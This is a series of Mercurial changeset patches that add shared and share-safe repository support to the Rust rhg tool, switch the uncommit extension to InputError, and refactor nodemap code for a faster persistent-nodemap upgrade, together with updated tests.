Node ID 8214c71589f6273d8de2a615d4b8b86c6d51dbb3 # Parent 1e26b882d7040f56c63c7e229f9d73629b70fc7b tests: print the server error log in `test-url-download.t` There was a stray 500 error in CI, but no additional context to know what the issue was. https://foss.heptapod.net/octobus/mercurial-devel/-/jobs/163093 Differential Revision: https://phab.mercurial-scm.org/D9949 diff --git a/tests/test-url-download.t b/tests/test-url-download.t --- a/tests/test-url-download.t +++ b/tests/test-url-download.t @@ -34,6 +34,8 @@ $ hg debugdownload ./null.txt 1 0000000000000000000000000000000000000000 + $ cat ../error.log + Test largefile URL ------------------ @@ -66,3 +68,5 @@ $ hg debugdownload "largefile://a57b57b39ee4dc3da1e03526596007f480ecdbe8" 1 0000000000000000000000000000000000000000 $ cd .. + + $ cat error.log # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612204228 -3600 # Mon Feb 01 19:30:28 2021 +0100 # Node ID f3f4d1b7dc979b902b4df1063a422959d16853d1 # Parent 8214c71589f6273d8de2a615d4b8b86c6d51dbb3 rhg: Add basic test with a shared repository Differential Revision: https://phab.mercurial-scm.org/D9940 diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -196,3 +196,67 @@ of $ rhg cat -r c3ae8dec9fad of r5000 + +Crate a shared repository + + $ echo "[extensions]" >> $HGRCPATH + $ echo "share = " >> $HGRCPATH + + $ cd $TESTTMP + $ hg init repo1 + $ cd repo1 + $ echo a > a + $ hg commit -A -m'init' + adding a + + $ cd .. + $ hg share repo1 repo2 + updating working directory + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +And check that basic rhg commands work with sharing + + $ cd repo2 + $ rhg files + [252] + $ rhg cat -r 0 a + [252] + +Same with relative sharing + + $ cd .. + $ hg share repo2 repo3 --relative + updating working directory + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + + $ cd repo3 + $ rhg files + [252] + $ rhg cat -r 0 a + [252] + +Same with share-safe + + $ echo "[format]" >> $HGRCPATH + $ echo "use-share-safe = True" >> $HGRCPATH + + $ cd $TESTTMP + $ hg init repo4 + $ cd repo4 + $ echo a > a + $ hg commit -A -m'init' + adding a + + $ cd .. + $ hg share repo4 repo5 + updating working directory + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +And check that basic rhg commands work with sharing + + $ cd repo5 + $ rhg files + [252] + $ rhg cat -r 0 a + [252] + # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1610625852 -3600 # Thu Jan 14 13:04:12 2021 +0100 # Node ID d03b0601e0eb1b65262ca6d78116422f97a3090f # Parent f3f4d1b7dc979b902b4df1063a422959d16853d1 rhg: initial support for shared repositories Differential Revision: https://phab.mercurial-scm.org/D9941 diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -40,6 +40,10 @@ // https://doc.rust-lang.org/std/backtrace/struct.Backtrace.html HgError::CorruptedRepository(explanation.into()) } + + pub fn unsupported(explanation: impl Into<String>) -> Self { + HgError::UnsupportedFeature(explanation.into()) + } } // TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly? diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,6 +1,8 @@ use crate::errors::{HgError, IoResultExt}; use crate::requirements; +use crate::utils::files::get_path_from_bytes; use memmap::{Mmap, MmapOptions}; +use std::collections::HashSet; use std::path::{Path, PathBuf}; /// A repository on disk @@ -8,6 +10,7 @@ working_directory: PathBuf, dot_hg: PathBuf, store: PathBuf, + requirements: HashSet<String>, } #[derive(Debug, derive_more::From)] @@ -32,15 +35,8 @@ let current_directory = crate::utils::current_dir()?; // ancestors() is inclusive: it first yields `current_directory` as-is. for ancestor in current_directory.ancestors() { - let dot_hg = ancestor.join(".hg"); - if dot_hg.is_dir() { - let repo = Self { - store: dot_hg.join("store"), - dot_hg, - working_directory: ancestor.to_owned(), - }; - requirements::check(&repo)?; - return Ok(repo); + if ancestor.join(".hg").is_dir() { + return Ok(Self::new_at_path(ancestor.to_owned())?); } } Err(RepoFindError::NotFoundInCurrentDirectoryOrAncestors { @@ -48,10 +44,54 @@ }) } + /// To be called after checking that `.hg` is a sub-directory + fn new_at_path(working_directory: PathBuf) -> Result<Self, HgError> { + let dot_hg = working_directory.join(".hg"); + let hg_vfs = Vfs { base: &dot_hg }; + let reqs = requirements::load_if_exists(hg_vfs)?; + let relative = + reqs.contains(requirements::RELATIVE_SHARED_REQUIREMENT); + let shared = + reqs.contains(requirements::SHARED_REQUIREMENT) || relative; + let store_path; + if !shared { + store_path = dot_hg.join("store"); + } else { + let bytes = hg_vfs.read("sharedpath")?; + let mut shared_path = get_path_from_bytes(&bytes).to_owned(); + if relative { + shared_path = dot_hg.join(shared_path) + } + if !shared_path.is_dir() { + return Err(HgError::corrupted(format!( + ".hg/sharedpath points to nonexistent directory {}", + shared_path.display() + ))); + } + + store_path = shared_path.join("store"); + } + + let repo = Self { + requirements: reqs, + working_directory, + store: store_path, + dot_hg, + }; + + requirements::check(&repo)?; + + Ok(repo) + } + pub fn working_directory_path(&self) -> &Path { &self.working_directory } + pub fn requirements(&self) -> &HashSet<String> { + &self.requirements + } + /// For accessing repository files (in `.hg`), except for the store /// (`.hg/store`). pub(crate) fn hg_vfs(&self) -> Vfs<'_> { diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -1,7 +1,8 @@ use crate::errors::{HgError, HgResultExt}; -use crate::repo::Repo; +use crate::repo::{Repo, Vfs}; +use std::collections::HashSet; -fn parse(bytes: &[u8]) -> Result<Vec<String>, HgError> { +fn parse(bytes: &[u8]) -> Result<HashSet<String>, HgError> { // The Python code reading this file uses `str.splitlines` // which looks for a number of line separators (even including a couple of // non-ASCII ones), but Python code writing it always uses `\n`. @@ -21,10 +22,8 @@ .collect() } -pub fn load(repo: &Repo) -> Result<Vec<String>, HgError> { - if let Some(bytes) = - repo.hg_vfs().read("requires").io_not_found_as_none()? - { +pub(crate) fn load_if_exists(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> { + if let Some(bytes) = hg_vfs.read("requires").io_not_found_as_none()? { parse(&bytes) } else { // Treat a missing file the same as an empty file. @@ -34,13 +33,13 @@ // > the repository. This file was introduced in Mercurial 0.9.2, // > which means very old repositories may not have one. We assume // > a missing file translates to no requirements. - Ok(Vec::new()) + Ok(HashSet::new()) } } -pub fn check(repo: &Repo) -> Result<(), HgError> { - for feature in load(repo)? { - if !SUPPORTED.contains(&&*feature) { +pub(crate) fn check(repo: &Repo) -> Result<(), HgError> { + for feature in repo.requirements() { + if !SUPPORTED.contains(&feature.as_str()) { // TODO: collect and all unknown features and include them in the // error message? return Err(HgError::UnsupportedFeature(format!( @@ -58,10 +57,77 @@ "fncache", "generaldelta", "revlogv1", - "sparserevlog", + SHARED_REQUIREMENT, + SPARSEREVLOG_REQUIREMENT, + RELATIVE_SHARED_REQUIREMENT, "store", // As of this writing everything rhg does is read-only. // When it starts writing to the repository, it’ll need to either keep the // persistent nodemap up to date or remove this entry: "persistent-nodemap", ]; + +// Copied from mercurial/requirements.py: + +/// When narrowing is finalized and no longer subject to format changes, +/// we should move this to just "narrow" or similar. +#[allow(unused)] +pub(crate) const NARROW_REQUIREMENT: &str = "narrowhg-experimental"; + +/// Enables sparse working directory usage +#[allow(unused)] +pub(crate) const SPARSE_REQUIREMENT: &str = "exp-sparse"; + +/// Enables the internal phase which is used to hide changesets instead +/// of stripping them +#[allow(unused)] +pub(crate) const INTERNAL_PHASE_REQUIREMENT: &str = "internal-phase"; + +/// Stores manifest in Tree structure +#[allow(unused)] +pub(crate) const TREEMANIFEST_REQUIREMENT: &str = "treemanifest"; + +/// Increment the sub-version when the revlog v2 format changes to lock out old +/// clients. +#[allow(unused)] +pub(crate) const REVLOGV2_REQUIREMENT: &str = "exp-revlogv2.1"; + +/// A repository with the sparserevlog feature will have delta chains that +/// can spread over a larger span. Sparse reading cuts these large spans into +/// pieces, so that each piece isn't too big. +/// Without the sparserevlog capability, reading from the repository could use +/// huge amounts of memory, because the whole span would be read at once, +/// including all the intermediate revisions that aren't pertinent for the +/// chain. This is why once a repository has enabled sparse-read, it becomes +/// required. +#[allow(unused)] +pub(crate) const SPARSEREVLOG_REQUIREMENT: &str = "sparserevlog"; + +/// A repository with the sidedataflag requirement will allow to store extra +/// information for revision without altering their original hashes. +#[allow(unused)] +pub(crate) const SIDEDATA_REQUIREMENT: &str = "exp-sidedata-flag"; + +/// A repository with the the copies-sidedata-changeset requirement will store +/// copies related information in changeset's sidedata. +#[allow(unused)] +pub(crate) const COPIESSDC_REQUIREMENT: &str = "exp-copies-sidedata-changeset"; + +/// The repository use persistent nodemap for the changelog and the manifest. +#[allow(unused)] +pub(crate) const NODEMAP_REQUIREMENT: &str = "persistent-nodemap"; + +/// Denotes that the current repository is a share +#[allow(unused)] +pub(crate) const SHARED_REQUIREMENT: &str = "shared"; + +/// Denotes that current repository is a share and the shared source path is +/// relative to the current repository root path +#[allow(unused)] +pub(crate) const RELATIVE_SHARED_REQUIREMENT: &str = "relshared"; + +/// A repository with share implemented safely. The repository has different +/// store and working copy requirements i.e. both `.hg/requires` and +/// `.hg/store/requires` are present. +#[allow(unused)] +pub(crate) const SHARESAFE_REQUIREMENT: &str = "exp-sharesafe"; diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -2,7 +2,6 @@ use crate::error::CommandError; use crate::ui::Ui; use hg::repo::Repo; -use hg::requirements; pub const HELP_TEXT: &str = " Print the current repo requirements. @@ -20,8 +19,10 @@ fn run(&self, ui: &Ui) -> Result<(), CommandError> { let repo = Repo::find()?; let mut output = String::new(); - for req in requirements::load(&repo)? { - output.push_str(&req); + let mut requirements: Vec<_> = repo.requirements().iter().collect(); + requirements.sort(); + for req in requirements { + output.push_str(req); output.push('\n'); } ui.write_stdout(output.as_bytes())?; diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -218,9 +218,9 @@ $ cd repo2 $ rhg files - [252] + a $ rhg cat -r 0 a - [252] + a Same with relative sharing @@ -231,9 +231,9 @@ $ cd repo3 $ rhg files - [252] + a $ rhg cat -r 0 a - [252] + a Same with share-safe # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612176070 -3600 # Mon Feb 01 11:41:10 2021 +0100 # Node ID 95b276283b671cd835a2a0918f4297eb2baab425 # Parent d03b0601e0eb1b65262ca6d78116422f97a3090f rhg: add support for share-safe Differential Revision: https://phab.mercurial-scm.org/D9942 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -47,15 +47,34 @@ /// To be called after checking that `.hg` is a sub-directory fn new_at_path(working_directory: PathBuf) -> Result<Self, HgError> { let dot_hg = working_directory.join(".hg"); + let hg_vfs = Vfs { base: &dot_hg }; - let reqs = requirements::load_if_exists(hg_vfs)?; + let mut reqs = requirements::load_if_exists(hg_vfs)?; let relative = reqs.contains(requirements::RELATIVE_SHARED_REQUIREMENT); let shared = reqs.contains(requirements::SHARED_REQUIREMENT) || relative; + + // From `mercurial/localrepo.py`: + // + // if .hg/requires contains the sharesafe requirement, it means + // there exists a `.hg/store/requires` too and we should read it + // NOTE: presence of SHARESAFE_REQUIREMENT imply that store requirement + // is present. We never write SHARESAFE_REQUIREMENT for a repo if store + // is not present, refer checkrequirementscompat() for that + // + // However, if SHARESAFE_REQUIREMENT is not present, it means that the + // repository was shared the old way. We check the share source + // .hg/requires for SHARESAFE_REQUIREMENT to detect whether the + // current repository needs to be reshared + let share_safe = reqs.contains(requirements::SHARESAFE_REQUIREMENT); + let store_path; if !shared { store_path = dot_hg.join("store"); + if share_safe { + reqs.extend(requirements::load(Vfs { base: &store_path })?); + } } else { let bytes = hg_vfs.read("sharedpath")?; let mut shared_path = get_path_from_bytes(&bytes).to_owned(); @@ -70,6 +89,17 @@ } store_path = shared_path.join("store"); + + let source_is_share_safe = + requirements::load(Vfs { base: &shared_path })? + .contains(requirements::SHARESAFE_REQUIREMENT); + + // TODO: support for `share.safe-mismatch.*` config + if share_safe && !source_is_share_safe { + return Err(HgError::unsupported("share-safe downgrade")); + } else if source_is_share_safe && !share_safe { + return Err(HgError::unsupported("share-safe upgrade")); + } } let repo = Self { diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -22,6 +22,10 @@ .collect() } +pub(crate) fn load(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> { + parse(&hg_vfs.read("requires")?) +} + pub(crate) fn load_if_exists(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> { if let Some(bytes) = hg_vfs.read("requires").io_not_found_as_none()? { parse(&bytes) @@ -58,6 +62,7 @@ "generaldelta", "revlogv1", SHARED_REQUIREMENT, + SHARESAFE_REQUIREMENT, SPARSEREVLOG_REQUIREMENT, RELATIVE_SHARED_REQUIREMENT, "store", @@ -130,4 +135,4 @@ /// store and working copy requirements i.e. both `.hg/requires` and /// `.hg/store/requires` are present. #[allow(unused)] -pub(crate) const SHARESAFE_REQUIREMENT: &str = "exp-sharesafe"; +pub(crate) const SHARESAFE_REQUIREMENT: &str = "share-safe"; diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -256,7 +256,7 @@ $ cd repo5 $ rhg files - [252] + a $ rhg cat -r 0 a - [252] + a # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611964260 28800 # Fri Jan 29 15:51:00 2021 -0800 # Node ID 0e2becd1fe0cd3f04518676798b95788a43b744c # Parent 95b276283b671cd835a2a0918f4297eb2baab425 errors: use InputError in uncommit extension Differential Revision: https://phab.mercurial-scm.org/D9911 diff --git a/hgext/uncommit.py b/hgext/uncommit.py --- a/hgext/uncommit.py +++ b/hgext/uncommit.py @@ -175,7 +175,7 @@ old = repo[b'.'] rewriteutil.precheck(repo, [old.rev()], b'uncommit') if len(old.parents()) > 1: - raise error.Abort(_(b"cannot uncommit merge changeset")) + raise error.InputError(_(b"cannot uncommit merge changeset")) match = scmutil.match(old, pats, opts) @@ -202,7 +202,7 @@ else: hint = _(b"file does not exist") - raise error.Abort( + raise error.InputError( _(b'cannot uncommit "%s"') % scmutil.getuipathfn(repo)(f), hint=hint, ) @@ -280,7 +280,7 @@ markers = list(predecessormarkers(curctx)) if len(markers) != 1: e = _(b"changeset must have one predecessor, found %i predecessors") - raise error.Abort(e % len(markers)) + raise error.InputError(e % len(markers)) prednode = markers[0].prednode() predctx = unfi[prednode] diff --git a/tests/test-unamend.t b/tests/test-unamend.t --- a/tests/test-unamend.t +++ b/tests/test-unamend.t @@ -39,7 +39,7 @@ $ hg unamend abort: changeset must have one predecessor, found 0 predecessors - [255] + [10] Unamend on clean wdir and tip diff --git a/tests/test-uncommit.t b/tests/test-uncommit.t --- a/tests/test-uncommit.t +++ b/tests/test-uncommit.t @@ -114,12 +114,12 @@ $ hg uncommit nothinghere abort: cannot uncommit "nothinghere" (file does not exist) - [255] + [10] $ hg status $ hg uncommit file-abc abort: cannot uncommit "file-abc" (file was not changed in working directory parent) - [255] + [10] $ hg status Try partial uncommit, also moves bookmark @@ -419,7 +419,7 @@ $ hg uncommit abort: cannot uncommit merge changeset - [255] + [10] $ hg status $ hg log -G -T '{rev}:{node} {desc}' --hidden @@ -585,12 +585,12 @@ $ hg uncommit emptydir abort: cannot uncommit "emptydir" (file was untracked in working directory parent) - [255] + [10] $ cd emptydir $ hg uncommit . abort: cannot uncommit "emptydir" (file was untracked in working directory parent) - [255] + [10] $ hg status $ cd .. # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1611564827 -19800 # Mon Jan 25 14:23:47 2021 +0530 # Node ID 3e3b81b6e7da5fdf8250c0ef7e4c5df0f954ca91 # Parent 0e2becd1fe0cd3f04518676798b95788a43b744c debugcommands: s/stdin/stdout in debugnodemap help Differential Revision: https://phab.mercurial-scm.org/D9930 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -2212,9 +2212,9 @@ b'', b'dump-new', False, - _(b'write a (new) persistent binary nodemap on stdin'), + _(b'write a (new) persistent binary nodemap on stdout'), ), - (b'', b'dump-disk', False, _(b'dump on-disk data on stdin')), + (b'', b'dump-disk', False, _(b'dump on-disk data on stdout')), ( b'', b'check', # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612114988 -19800 # Sun Jan 31 23:13:08 2021 +0530 # Node ID 45c3a263d5d1464aa61e59f4d376a5fd9438125a # Parent 3e3b81b6e7da5fdf8250c0ef7e4c5df0f954ca91 engine: 'if not, else' -> 'if, else' I personally feel that ``` if x: pass else: pass ``` is easier to read and edit than ``` if not x: pass else: pass ``` Next patches will add one more if-else clause. Differential Revision: https://phab.mercurial-scm.org/D9931 diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -449,7 +449,10 @@ ) ) - if not upgrade_op.requirements_only: + if upgrade_op.requirements_only: + ui.status(_(b'upgrading repository requirements\n')) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + else: with dstrepo.transaction(b'upgrade') as tr: _clonerevlogs( ui, @@ -532,8 +535,5 @@ # could update srcrepo.svfs and other variables to point to the new # location. This is simpler. backupvfs.unlink(b'store/lock') - else: - ui.status(_(b'upgrading repository requirements\n')) - scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) return backuppath # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612116299 -19800 # Sun Jan 31 23:34:59 2021 +0530 # Node ID 83f037acf71a8773c88a597c7ea35cb572147d7e # Parent 45c3a263d5d1464aa61e59f4d376a5fd9438125a nodemap: make `_persist_nodemap` a public function I will like to have a utility function using which we can directly write out nodemap for a repository without going through the recloning process. This function seems like the one containing important pieces for that. Let's make it public. Differential Revision: https://phab.mercurial-scm.org/D9932 diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -81,9 +81,9 @@ if tr.hasfinalize(callback_id): return # no need to register again tr.addpending( - callback_id, lambda tr: _persist_nodemap(tr, revlog, pending=True) + callback_id, lambda tr: persist_nodemap(tr, revlog, pending=True) ) - tr.addfinalize(callback_id, lambda tr: _persist_nodemap(tr, revlog)) + tr.addfinalize(callback_id, lambda tr: persist_nodemap(tr, revlog)) class _NoTransaction(object): @@ -123,12 +123,12 @@ return # we do not use persistent_nodemap on this revlog notr = _NoTransaction() - _persist_nodemap(notr, revlog) + persist_nodemap(notr, revlog) for k in sorted(notr._postclose): notr._postclose[k](None) -def _persist_nodemap(tr, revlog, pending=False): +def persist_nodemap(tr, revlog, pending=False): """Write nodemap data on disk for a given revlog""" if getattr(revlog, 'filteredrevs', ()): raise error.ProgrammingError( # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612116511 -19800 # Sun Jan 31 23:38:31 2021 +0530 # Node ID 835aafb2543f8354382e95b931d532595e96017f # Parent 83f037acf71a8773c88a597c7ea35cb572147d7e revlog: refactor logic to compute nodemap file in separate function I will like to use it one more place. Differential Revision: https://phab.mercurial-scm.org/D9933 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -448,14 +448,9 @@ self.datafile = datafile or (indexfile[:-2] + b".d") self.nodemap_file = None if persistentnodemap: - if indexfile.endswith(b'.a'): - pending_path = indexfile[:-4] + b".n.a" - if opener.exists(pending_path): - self.nodemap_file = pending_path - else: - self.nodemap_file = indexfile[:-4] + b".n" - else: - self.nodemap_file = indexfile[:-2] + b".n" + self.nodemap_file = nodemaputil.get_nodemap_file( + opener, self.indexfile + ) self.opener = opener # When True, indexfile is opened with checkambig=True at writing, to diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -634,3 +634,14 @@ if isinstance(entry, dict): return _find_node(entry, node[1:]) return entry + + +def get_nodemap_file(opener, indexfile): + if indexfile.endswith(b'.a'): + pending_path = indexfile[:-4] + b".n.a" + if opener.exists(pending_path): + return pending_path + else: + return indexfile[:-4] + b".n" + else: + return indexfile[:-2] + b".n" # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612116657 -19800 # Sun Jan 31 23:40:57 2021 +0530 # Node ID dadb4db55661192aa3ee0f51bd3cdd24b80d4b15 # Parent 835aafb2543f8354382e95b931d532595e96017f nodemap: fix a typo in error message Differential Revision: https://phab.mercurial-scm.org/D9934 diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -135,7 +135,7 @@ "cannot persist nodemap of a filtered changelog" ) if revlog.nodemap_file is None: - msg = "calling persist nodemap on a revlog without the feature enableb" + msg = "calling persist nodemap on a revlog without the feature enabled" raise error.ProgrammingError(msg) can_incremental = util.safehasattr(revlog.index, "nodemap_data_incremental") # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612118427 -19800 # Mon Feb 01 00:10:27 2021 +0530 # Node ID bfaacfa8ebfc5c686080ef882b7b6b57a558d68d # Parent dadb4db55661192aa3ee0f51bd3cdd24b80d4b15 tests: unquiet a test to show changes in next patch Differential Revision: https://phab.mercurial-scm.org/D9935 diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -617,18 +617,42 @@ plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default - $ hg debugupgraderepo --run --no-backup --quiet + $ hg debugupgraderepo --run --no-backup upgrade will perform the following actions: requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store added: persistent-nodemap + persistent-nodemap + Speedup revision lookup by node id. + processed revlogs: - all-filelogs - changelog - manifest + beginning upgrade... + repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + migrating 15018 total revisions (5006 in filelogs, 5006 in manifests, 5006 in changelog) + migrating 1.74 MB in store; 569 MB tracked data + migrating 5004 filelogs containing 5006 revisions (346 KB in store; 28.2 KB tracked data) + finished migrating 5006 filelog revisions across 5004 filelogs; change in size: 0 bytes + migrating 1 manifests containing 5006 revisions (765 KB in store; 569 MB tracked data) + finished migrating 5006 manifest revisions across 1 manifests; change in size: 0 bytes + migrating changelog containing 5006 revisions (673 KB in store; 363 KB tracked data) + finished migrating 5006 changelog revisions; change in size: 0 bytes + finished migrating 15018 total revisions; total change in store size: 0 bytes + copying phaseroots + data fully upgraded in a temporary repository + marking source repository as being upgraded; clients will be unable to read from repository + starting in-place swap of repository data + replacing store... + store replacement complete; repository was inconsistent for *s (glob) + finalizing requirements file and making repository readable again + removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob) $ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) 00changelog.n # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612117920 -19800 # Mon Feb 01 00:02:00 2021 +0530 # Node ID 98e39f04d60e5dbfc6c70fd3ba5465b3e62ca662 # Parent bfaacfa8ebfc5c686080ef882b7b6b57a558d68d upgrade: implement partial upgrade for upgrading persistent-nodemap Upgrading repositories to use persistent nodemap should be fast and easy as it requires only two things: 1) Updating the requirements 2) Writing a persistent-nodemap on disk For both of the steps above, we don't need to edit existing revlogs. This patch makes upgrade only do the above mentioned two steps if we are only upgarding to use persistent-nodemap feature. Since `nodemap.persist_nodemap()` assumes that there exists a nodemap file for the given revlog if we are trying to call it, this patch adds `force` argument to create a file if does not exist which is true in our upgrade case. The test changes demonstrate that we no longer write nodemap files for manifest after upgrade which I think is desirable. Differential Revision: https://phab.mercurial-scm.org/D9936 diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -128,15 +128,20 @@ notr._postclose[k](None) -def persist_nodemap(tr, revlog, pending=False): +def persist_nodemap(tr, revlog, pending=False, force=False): """Write nodemap data on disk for a given revlog""" if getattr(revlog, 'filteredrevs', ()): raise error.ProgrammingError( "cannot persist nodemap of a filtered changelog" ) if revlog.nodemap_file is None: - msg = "calling persist nodemap on a revlog without the feature enabled" - raise error.ProgrammingError(msg) + if force: + revlog.nodemap_file = get_nodemap_file( + revlog.opener, revlog.indexfile + ) + else: + msg = "calling persist nodemap on a revlog without the feature enabled" + raise error.ProgrammingError(msg) can_incremental = util.safehasattr(revlog.index, "nodemap_data_incremental") ondisk_docket = revlog._nodemap_docket diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -24,6 +24,7 @@ util, vfs as vfsmod, ) +from ..revlogutils import nodemap def _revlogfrompath(repo, path): @@ -452,6 +453,22 @@ if upgrade_op.requirements_only: ui.status(_(b'upgrading repository requirements\n')) scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + # if there is only one action and that is persistent nodemap upgrade + # directly write the nodemap file and update requirements instead of going + # through the whole cloning process + elif ( + len(upgrade_op.upgrade_actions) == 1 + and b'persistent-nodemap' in upgrade_op._upgrade_actions_names + and not upgrade_op.removed_actions + ): + ui.status( + _(b'upgrading repository to use persistent nodemap feature\n') + ) + with srcrepo.transaction(b'upgrade') as tr: + unfi = srcrepo.unfiltered() + cl = unfi.changelog + nodemap.persist_nodemap(tr, cl, force=True) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) else: with dstrepo.transaction(b'upgrade') as tr: _clonerevlogs( diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -636,28 +636,11 @@ repository locked and read-only creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob) (it is safe to interrupt this process any time before data migration completes) - migrating 15018 total revisions (5006 in filelogs, 5006 in manifests, 5006 in changelog) - migrating 1.74 MB in store; 569 MB tracked data - migrating 5004 filelogs containing 5006 revisions (346 KB in store; 28.2 KB tracked data) - finished migrating 5006 filelog revisions across 5004 filelogs; change in size: 0 bytes - migrating 1 manifests containing 5006 revisions (765 KB in store; 569 MB tracked data) - finished migrating 5006 manifest revisions across 1 manifests; change in size: 0 bytes - migrating changelog containing 5006 revisions (673 KB in store; 363 KB tracked data) - finished migrating 5006 changelog revisions; change in size: 0 bytes - finished migrating 15018 total revisions; total change in store size: 0 bytes - copying phaseroots - data fully upgraded in a temporary repository - marking source repository as being upgraded; clients will be unable to read from repository - starting in-place swap of repository data - replacing store... - store replacement complete; repository was inconsistent for *s (glob) - finalizing requirements file and making repository readable again + upgrading repository to use persistent nodemap feature removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob) $ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) 00changelog.n - 00manifest-*.nd (glob) - 00manifest.n $ hg debugnodemap --metadata uid: * (glob) # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1612290328 18000 # Tue Feb 02 13:25:28 2021 -0500 # Node ID d6e73351533b427d68a2bb0e165b60a3218210c4 # Parent 98e39f04d60e5dbfc6c70fd3ba5465b3e62ca662 # Parent 33dbc9f785e719fb583e8e3c2984634258f1fd77 branching: merge with stable diff --git a/.hgsigs b/.hgsigs --- a/.hgsigs +++ b/.hgsigs @@ -206,3 +206,4 @@ 18c17d63fdabd009e70bf994e5efb7db422f4f7f 0 